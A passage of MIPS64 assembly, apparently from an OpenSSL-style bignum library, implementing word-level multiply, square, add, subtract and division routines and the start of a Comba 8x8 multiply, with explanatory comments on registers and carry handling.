/* Up to three leftover words, same add-with-carry pattern as the loop. */
dmultu t0,a3
ld t1,0(a0)
subu a2,1
daddu t1,v0
sltu v0,t1,v0
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,0(a0)
daddu v0,AT
beqz a2,.L_bn_mul_add_words_return
ld t0,8(a1)
dmultu t0,a3
ld t1,8(a0)
subu a2,1
daddu t1,v0
sltu v0,t1,v0
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,8(a0)
daddu v0,AT
beqz a2,.L_bn_mul_add_words_return
ld t0,16(a1)
dmultu t0,a3
ld t1,16(a0)
daddu t1,v0
sltu v0,t1,v0
mflo AT
mfhi t0
daddu t1,AT
daddu v0,t0
sltu AT,t1,AT
sd t1,16(a0)
daddu v0,AT
jr ra
END(bn_mul_add_words)
.align 5
LEAF(bn_mul_words)
/*
 * BN_ULONG bn_mul_words(BN_ULONG *rp, const BN_ULONG *ap, int num, BN_ULONG w)
 *   rp[i] = lo(ap[i] * w) + carry; returns the final carry in v0.
 * Registers: a0=rp, a1=ap, a2=num, a3=w.
 * 4-way unrolled main loop plus a tail for num%4 words; same
 * branch-likely load-ahead scheduling as bn_mul_add_words.
 */
.set noreorder
bgtzl a2,.L_bn_mul_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_mul_words_proceed:
li MINUS4,-4
and ta0,a2,MINUS4
move v0,zero
beqz ta0,.L_bn_mul_words_tail
.L_bn_mul_words_loop:
/* v0 doubles as the running word being built: v0 = lo + carry_in,
 * then carry_out = hi + overflow-of-(lo+carry_in). */
dmultu t0,a3
ld t2,8(a1)
ld ta0,16(a1)
ld ta2,24(a1)
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,0(a0)
daddu v0,t1,t0
dmultu t2,a3
subu a2,4
PTR_ADD a0,32
PTR_ADD a1,32
mflo AT
mfhi t2
daddu v0,AT
sltu t3,v0,AT
sd v0,-24(a0)
daddu v0,t3,t2
dmultu ta0,a3
mflo AT
mfhi ta0
daddu v0,AT
sltu ta1,v0,AT
sd v0,-16(a0)
daddu v0,ta1,ta0
dmultu ta2,a3
and ta0,a2,MINUS4
mflo AT
mfhi ta2
daddu v0,AT
sltu ta3,v0,AT
sd v0,-8(a0)
daddu v0,ta3,ta2
.set noreorder
bgtzl ta0,.L_bn_mul_words_loop
ld t0,0(a1)
bnezl a2,.L_bn_mul_words_tail
ld t0,0(a1)
.set reorder
.L_bn_mul_words_return:
jr ra
.L_bn_mul_words_tail:
/* Up to three leftover words. */
dmultu t0,a3
subu a2,1
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,0(a0)
daddu v0,t1,t0
beqz a2,.L_bn_mul_words_return
ld t0,8(a1)
dmultu t0,a3
subu a2,1
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,8(a0)
daddu v0,t1,t0
beqz a2,.L_bn_mul_words_return
ld t0,16(a1)
dmultu t0,a3
mflo AT
mfhi t0
daddu v0,AT
sltu t1,v0,AT
sd v0,16(a0)
daddu v0,t1,t0
jr ra
END(bn_mul_words)
.align 5
LEAF(bn_sqr_words)
/*
 * BN_ULONG bn_sqr_words(BN_ULONG *rp, const BN_ULONG *ap, int num)
 *   rp[2i] = lo(ap[i]^2), rp[2i+1] = hi(ap[i]^2) for i in [0,num).
 * Registers: a0=rp, a1=ap, a2=num.  Returns 0 in v0.
 * No inter-word carries, so the 4-way unrolled loop is pure
 * multiply/store; tail handles num%4 words.
 */
.set noreorder
bgtzl a2,.L_bn_sqr_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_sqr_words_proceed:
li MINUS4,-4
and ta0,a2,MINUS4
move v0,zero
beqz ta0,.L_bn_sqr_words_tail
.L_bn_sqr_words_loop:
dmultu t0,t0
ld t2,8(a1)
ld ta0,16(a1)
ld ta2,24(a1)
mflo t1
mfhi t0
sd t1,0(a0)
sd t0,8(a0)
dmultu t2,t2
subu a2,4
PTR_ADD a0,64
PTR_ADD a1,32
mflo t3
mfhi t2
sd t3,-48(a0)
sd t2,-40(a0)
dmultu ta0,ta0
mflo ta1
mfhi ta0
sd ta1,-32(a0)
sd ta0,-24(a0)
dmultu ta2,ta2
and ta0,a2,MINUS4
mflo ta3
mfhi ta2
sd ta3,-16(a0)
sd ta2,-8(a0)
.set noreorder
bgtzl ta0,.L_bn_sqr_words_loop
ld t0,0(a1)
bnezl a2,.L_bn_sqr_words_tail
ld t0,0(a1)
.set reorder
.L_bn_sqr_words_return:
move v0,zero
jr ra
.L_bn_sqr_words_tail:
/* Up to three leftover words; rp advances two words per input word. */
dmultu t0,t0
subu a2,1
mflo t1
mfhi t0
sd t1,0(a0)
sd t0,8(a0)
beqz a2,.L_bn_sqr_words_return
ld t0,8(a1)
dmultu t0,t0
subu a2,1
mflo t1
mfhi t0
sd t1,16(a0)
sd t0,24(a0)
beqz a2,.L_bn_sqr_words_return
ld t0,16(a1)
dmultu t0,t0
mflo t1
mfhi t0
sd t1,32(a0)
sd t0,40(a0)
jr ra
END(bn_sqr_words)
.align 5
LEAF(bn_add_words)
/*
 * BN_ULONG bn_add_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp, int num)
 *   rp[i] = ap[i] + bp[i] + carry; returns the final carry (0/1) in v0.
 * Registers: a0=rp, a1=ap, a2=bp, a3=num.
 * Two sltu tests per word detect overflow of (a+b) and of (+carry)
 * separately; 4-way unrolled loop plus num%4 tail.
 */
.set noreorder
bgtzl a3,.L_bn_add_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_add_words_proceed:
li MINUS4,-4
and AT,a3,MINUS4
move v0,zero
beqz AT,.L_bn_add_words_tail
.L_bn_add_words_loop:
ld ta0,0(a2)
subu a3,4
ld t1,8(a1)
and AT,a3,MINUS4
ld t2,16(a1)
PTR_ADD a2,32
ld t3,24(a1)
PTR_ADD a0,32
ld ta1,-24(a2)
PTR_ADD a1,32
ld ta2,-16(a2)
ld ta3,-8(a2)
daddu ta0,t0
sltu t8,ta0,t0
daddu t0,ta0,v0
sltu v0,t0,ta0
sd t0,-32(a0)
daddu v0,t8
daddu ta1,t1
sltu t9,ta1,t1
daddu t1,ta1,v0
sltu v0,t1,ta1
sd t1,-24(a0)
daddu v0,t9
daddu ta2,t2
sltu t8,ta2,t2
daddu t2,ta2,v0
sltu v0,t2,ta2
sd t2,-16(a0)
daddu v0,t8
daddu ta3,t3
sltu t9,ta3,t3
daddu t3,ta3,v0
sltu v0,t3,ta3
sd t3,-8(a0)
daddu v0,t9
.set noreorder
bgtzl AT,.L_bn_add_words_loop
ld t0,0(a1)
bnezl a3,.L_bn_add_words_tail
ld t0,0(a1)
.set reorder
.L_bn_add_words_return:
jr ra
.L_bn_add_words_tail:
/* Up to three leftover words. */
ld ta0,0(a2)
daddu ta0,t0
subu a3,1
sltu t8,ta0,t0
daddu t0,ta0,v0
sltu v0,t0,ta0
sd t0,0(a0)
daddu v0,t8
beqz a3,.L_bn_add_words_return
ld t1,8(a1)
ld ta1,8(a2)
daddu ta1,t1
subu a3,1
sltu t9,ta1,t1
daddu t1,ta1,v0
sltu v0,t1,ta1
sd t1,8(a0)
daddu v0,t9
beqz a3,.L_bn_add_words_return
ld t2,16(a1)
ld ta2,16(a2)
daddu ta2,t2
sltu t8,ta2,t2
daddu t2,ta2,v0
sltu v0,t2,ta2
sd t2,16(a0)
daddu v0,t8
jr ra
END(bn_add_words)
.align 5
LEAF(bn_sub_words)
/*
 * BN_ULONG bn_sub_words(BN_ULONG *rp, const BN_ULONG *ap, const BN_ULONG *bp, int num)
 *   rp[i] = ap[i] - bp[i] - borrow; returns the final borrow (0/1) in v0.
 * Registers: a0=rp, a1=ap, a2=bp, a3=num.
 * Borrow update uses MOVNZ: when (a - b) is non-zero the borrow of
 * a<b wins; when it is zero the incoming borrow propagates unchanged.
 */
.set noreorder
bgtzl a3,.L_bn_sub_words_proceed
ld t0,0(a1)
jr ra
move v0,zero
.set reorder
.L_bn_sub_words_proceed:
li MINUS4,-4
and AT,a3,MINUS4
move v0,zero
beqz AT,.L_bn_sub_words_tail
.L_bn_sub_words_loop:
ld ta0,0(a2)
subu a3,4
ld t1,8(a1)
and AT,a3,MINUS4
ld t2,16(a1)
PTR_ADD a2,32
ld t3,24(a1)
PTR_ADD a0,32
ld ta1,-24(a2)
PTR_ADD a1,32
ld ta2,-16(a2)
ld ta3,-8(a2)
sltu t8,t0,ta0
dsubu t0,ta0
dsubu ta0,t0,v0
sd ta0,-32(a0)
MOVNZ (t0,v0,t8)
sltu t9,t1,ta1
dsubu t1,ta1
dsubu ta1,t1,v0
sd ta1,-24(a0)
MOVNZ (t1,v0,t9)
sltu t8,t2,ta2
dsubu t2,ta2
dsubu ta2,t2,v0
sd ta2,-16(a0)
MOVNZ (t2,v0,t8)
sltu t9,t3,ta3
dsubu t3,ta3
dsubu ta3,t3,v0
sd ta3,-8(a0)
MOVNZ (t3,v0,t9)
.set noreorder
bgtzl AT,.L_bn_sub_words_loop
ld t0,0(a1)
bnezl a3,.L_bn_sub_words_tail
ld t0,0(a1)
.set reorder
.L_bn_sub_words_return:
jr ra
.L_bn_sub_words_tail:
/* Up to three leftover words. */
ld ta0,0(a2)
subu a3,1
sltu t8,t0,ta0
dsubu t0,ta0
dsubu ta0,t0,v0
MOVNZ (t0,v0,t8)
sd ta0,0(a0)
beqz a3,.L_bn_sub_words_return
ld t1,8(a1)
subu a3,1
ld ta1,8(a2)
sltu t9,t1,ta1
dsubu t1,ta1
dsubu ta1,t1,v0
MOVNZ (t1,v0,t9)
sd ta1,8(a0)
beqz a3,.L_bn_sub_words_return
ld t2,16(a1)
ld ta2,16(a2)
sltu t8,t2,ta2
dsubu t2,ta2
dsubu ta2,t2,v0
MOVNZ (t2,v0,t8)
sd ta2,16(a0)
jr ra
END(bn_sub_words)
#undef MINUS4
.align 5
LEAF(bn_div_3_words)
/*
 * BN_ULONG bn_div_3_words(BN_ULONG *m, BN_ULONG d0, BN_ULONG d1)
 *   Estimates the quotient digit q = (m[0]:m[-1]) / d0 via
 *   bn_div_words, then corrects it downward while
 *   q*d1 > ((remainder:m[-2])), i.e. a 3-word-by-2-word division
 *   as used by BN_div.  Returns q (or ~0 on the overflow case
 *   m[0] == d0) in v0.
 * Registers on entry: a0=m (pointer to the high word), a1=d1, a2=d0.
 */
.set reorder
move a3,a0 /* we know that bn_div_words doesn't
* touch a3, ta2, ta3 and preserves a2
* so that we can save two arguments
* and return address in registers
* instead of stack:-)
*/
ld a0,(a3)
move ta2,a1
ld a1,-8(a3)
bne a0,a2,.L_bn_div_3_words_proceed
li v0,-1
jr ra
.L_bn_div_3_words_proceed:
move ta3,ra
bal bn_div_words
move ra,ta3
/* v0 = estimated q, v1 = remainder; check q*d1 against (v1:m[-2]). */
dmultu ta2,v0
ld t2,-16(a3)
move ta0,zero
mfhi t1
mflo t0
sltu t8,t1,v1
.L_bn_div_3_words_inner_loop:
bnez t8,.L_bn_div_3_words_inner_loop_done
sgeu AT,t2,t0
seq t9,t1,v1
and AT,t9
sltu t3,t0,ta2
daddu v1,a2
dsubu t1,t3
dsubu t0,ta2
sltu t8,t1,v1
sltu ta0,v1,a2
or t8,ta0
.set noreorder
beqzl AT,.L_bn_div_3_words_inner_loop
dsubu v0,1
.set reorder
.L_bn_div_3_words_inner_loop_done:
jr ra
END(bn_div_3_words)
.align 5
LEAF(bn_div_words)
/*
 * BN_ULONG bn_div_words(BN_ULONG h, BN_ULONG l, BN_ULONG d)
 *   128-bit by 64-bit division: returns (h:l)/d in v0; the remainder
 *   is left in v1.  Registers: a0=h, a1=l, a2=d.
 * Algorithm: normalize d so its top bit is set (shifting h:l by the
 * same amount, t9), then produce two 32-bit quotient halves, each
 * estimated with ddivu by the high 32 bits of d and corrected in an
 * inner loop — the classic Knuth schoolbook step.
 * Division by zero returns -1; quotient overflow triggers 'break 6'.
 */
.set noreorder
bnezl a2,.L_bn_div_words_proceed
move v1,zero
jr ra
li v0,-1 /* I'd rather signal div-by-zero
* which can be done with 'break 7' */
.L_bn_div_words_proceed:
bltz a2,.L_bn_div_words_body
move t9,v1
/* Count normalization shift: t9 = number of leading zero bits of d. */
dsll a2,1
bgtz a2,.-4
addu t9,1
.set reorder
negu t1,t9
li t2,-1
dsll t2,t1
and t2,a0
dsrl AT,a1,t1
.set noreorder
bnezl t2,.+8
break 6 /* signal overflow */
.set reorder
dsll a0,t9
dsll a1,t9
or a0,AT
#define QT ta0
#define HH ta1
#define DH v1
.L_bn_div_words_body:
dsrl DH,a2,32
sgeu AT,a0,a2
.set noreorder
bnezl AT,.+8
dsubu a0,a2
.set reorder
/* First quotient half: q1 = min(0xffffffff, hi64(a0:a1)/DH), corrected. */
li QT,-1
dsrl HH,a0,32
dsrl QT,32 /* q=0xffffffff */
beq DH,HH,.L_bn_div_words_skip_div1
ddivu zero,a0,DH
mflo QT
.L_bn_div_words_skip_div1:
dmultu a2,QT
dsll t3,a0,32
dsrl AT,a1,32
or t3,AT
mflo t0
mfhi t1
.L_bn_div_words_inner_loop1:
sltu t2,t3,t0
seq t8,HH,t1
sltu AT,HH,t1
and t2,t8
sltu v0,t0,a2
or AT,t2
.set noreorder
beqz AT,.L_bn_div_words_inner_loop1_done
dsubu t1,v0
dsubu t0,a2
b .L_bn_div_words_inner_loop1
dsubu QT,1
.set reorder
.L_bn_div_words_inner_loop1_done:
dsll a1,32
dsubu a0,t3,t0
dsll v0,QT,32
/* Second quotient half, same estimate-and-correct step. */
li QT,-1
dsrl HH,a0,32
dsrl QT,32 /* q=0xffffffff */
beq DH,HH,.L_bn_div_words_skip_div2
ddivu zero,a0,DH
mflo QT
.L_bn_div_words_skip_div2:
#undef DH
dmultu a2,QT
dsll t3,a0,32
dsrl AT,a1,32
or t3,AT
mflo t0
mfhi t1
.L_bn_div_words_inner_loop2:
sltu t2,t3,t0
seq t8,HH,t1
sltu AT,HH,t1
and t2,t8
sltu v1,t0,a2
or AT,t2
.set noreorder
beqz AT,.L_bn_div_words_inner_loop2_done
dsubu t1,v1
dsubu t0,a2
b .L_bn_div_words_inner_loop2
dsubu QT,1
.set reorder
.L_bn_div_words_inner_loop2_done:
#undef HH
dsubu a0,t3,t0
or v0,QT
dsrl v1,a0,t9 /* v1 contains remainder if anybody wants it */
dsrl a2,t9 /* restore a2 */
jr ra
#undef QT
END(bn_div_words)
#define a_0 t0
#define a_1 t1
#define a_2 t2
#define a_3 t3
#define b_0 ta0
#define b_1 ta1
#define b_2 ta2
#define b_3 ta3
#define a_4 s0
#define a_5 s2
#define a_6 s4
#define a_7 a1 /* once we load a[7] we don't need a anymore */
#define b_4 s1
#define b_5 s3
#define b_6 s5
#define b_7 a2 /* once we load b[7] we don't need b anymore */
#define t_1 t8
#define t_2 t9
#define c_1 v0
#define c_2 v1
#define c_3 a3
#define FRAME_SIZE 48
.align 5
LEAF(bn_mul_comba8)
/*
 * void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
 *   Comba 8x8 multiply: r[0..15] = a[0..7]*b[0..7].
 * Registers: a0=r, a1=a, a2=b; a_7/b_7 alias a1/a2 once all inputs are
 * loaded.  Column sums rotate through (c_1,c_2,c_3)=(v0,v1,a3); each
 * dmultu stanza adds one 128-bit partial product with explicit sltu
 * carry detection.  s0-s5 are callee-saved and spilled to the frame.
 * NOTE(review): `.frame sp,64,ra` disagrees with FRAME_SIZE (48) used
 * by PTR_SUB/PTR_ADD — debug-info-only discrepancy; verify if unwind
 * accuracy matters.
 */
.set noreorder
PTR_SUB sp,FRAME_SIZE
.frame sp,64,ra
.set reorder
ld a_0,0(a1) /* If compiled with -mips3 option on
* R5000 box assembler barks on this
* line with "shouldn't have mult/div
* as last instruction in bb (R10K
* bug)" warning. If anybody out there
* has a clue about how to circumvent
* this do send me a note.
* <appro@fy.chalmers.se>
*/
ld b_0,0(a2)
ld a_1,8(a1)
ld a_2,16(a1)
ld a_3,24(a1)
ld b_1,8(a2)
ld b_2,16(a2)
ld b_3,24(a2)
dmultu a_0,b_0 /* mul_add_c(a[0],b[0],c1,c2,c3); */
sd s0,0(sp)
sd s1,8(sp)
sd s2,16(sp)
sd s3,24(sp)
sd s4,32(sp)
sd s5,40(sp)
mflo c_1
mfhi c_2
dmultu a_0,b_1 /* mul_add_c(a[0],b[1],c2,c3,c1); */
ld a_4,32(a1)
ld a_5,40(a1)
ld a_6,48(a1)
ld a_7,56(a1)
ld b_4,32(a2)
ld b_5,40(a2)
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu c_3,t_2,AT
dmultu a_1,b_0 /* mul_add_c(a[1],b[0],c2,c3,c1); */
ld b_6,48(a2)
ld b_7,56(a2)
sd c_1,0(a0) /* r[0]=c1; */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
sd c_2,8(a0) /* r[1]=c2; */
dmultu a_2,b_0 /* mul_add_c(a[2],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
dmultu a_1,b_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_0,b_2 /* mul_add_c(a[0],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0) /* r[2]=c3; */
dmultu a_0,b_3 /* mul_add_c(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_1,b_2 /* mul_add_c(a[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_2,b_1 /* mul_add_c(a[2],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,b_0 /* mul_add_c(a[3],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0) /* r[3]=c1; */
dmultu a_4,b_0 /* mul_add_c(a[4],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_3,b_1 /* mul_add_c(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,b_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_1,b_3 /* mul_add_c(a[1],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_0,b_4 /* mul_add_c(a[0],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0) /* r[4]=c2; */
dmultu a_0,b_5 /* mul_add_c(a[0],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_1,b_4 /* mul_add_c(a[1],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_2,b_3 /* mul_add_c(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_3,b_2 /* mul_add_c(a[3],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_4,b_1 /* mul_add_c(a[4],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,b_0 /* mul_add_c(a[5],b[0],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0) /* r[5]=c3; */
dmultu a_6,b_0 /* mul_add_c(a[6],b[0],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_5,b_1 /* mul_add_c(a[5],b[1],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,b_2 /* mul_add_c(a[4],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_3,b_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_2,b_4 /* mul_add_c(a[2],b[4],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_1,b_5 /* mul_add_c(a[1],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_0,b_6 /* mul_add_c(a[0],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,48(a0) /* r[6]=c1; */
dmultu a_0,b_7 /* mul_add_c(a[0],b[7],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_1,b_6 /* mul_add_c(a[1],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,b_5 /* mul_add_c(a[2],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_3,b_4 /* mul_add_c(a[3],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_4,b_3 /* mul_add_c(a[4],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_5,b_2 /* mul_add_c(a[5],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_6,b_1 /* mul_add_c(a[6],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_7,b_0 /* mul_add_c(a[7],b[0],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,56(a0) /* r[7]=c2; */
dmultu a_7,b_1 /* mul_add_c(a[7],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu c_2,c_1,t_2
dmultu a_6,b_2 /* mul_add_c(a[6],b[2],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_5,b_3 /* mul_add_c(a[5],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_4,b_4 /* mul_add_c(a[4],b[4],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_3,b_5 /* mul_add_c(a[3],b[5],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_2,b_6 /* mul_add_c(a[2],b[6],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
dmultu a_1,b_7 /* mul_add_c(a[1],b[7],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,64(a0) /* r[8]=c3; */
dmultu a_2,b_7 /* mul_add_c(a[2],b[7],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu c_3,c_2,t_2
dmultu a_3,b_6 /* mul_add_c(a[3],b[6],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_4,b_5 /* mul_add_c(a[4],b[5],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_5,b_4 /* mul_add_c(a[5],b[4],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_6,b_3 /* mul_add_c(a[6],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_7,b_2 /* mul_add_c(a[7],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,72(a0) /* r[9]=c1; */
dmultu a_7,b_3 /* mul_add_c(a[7],b[3],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu c_1,c_3,t_2
dmultu a_6,b_4 /* mul_add_c(a[6],b[4],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_5,b_5 /* mul_add_c(a[5],b[5],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_4,b_6 /* mul_add_c(a[4],b[6],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
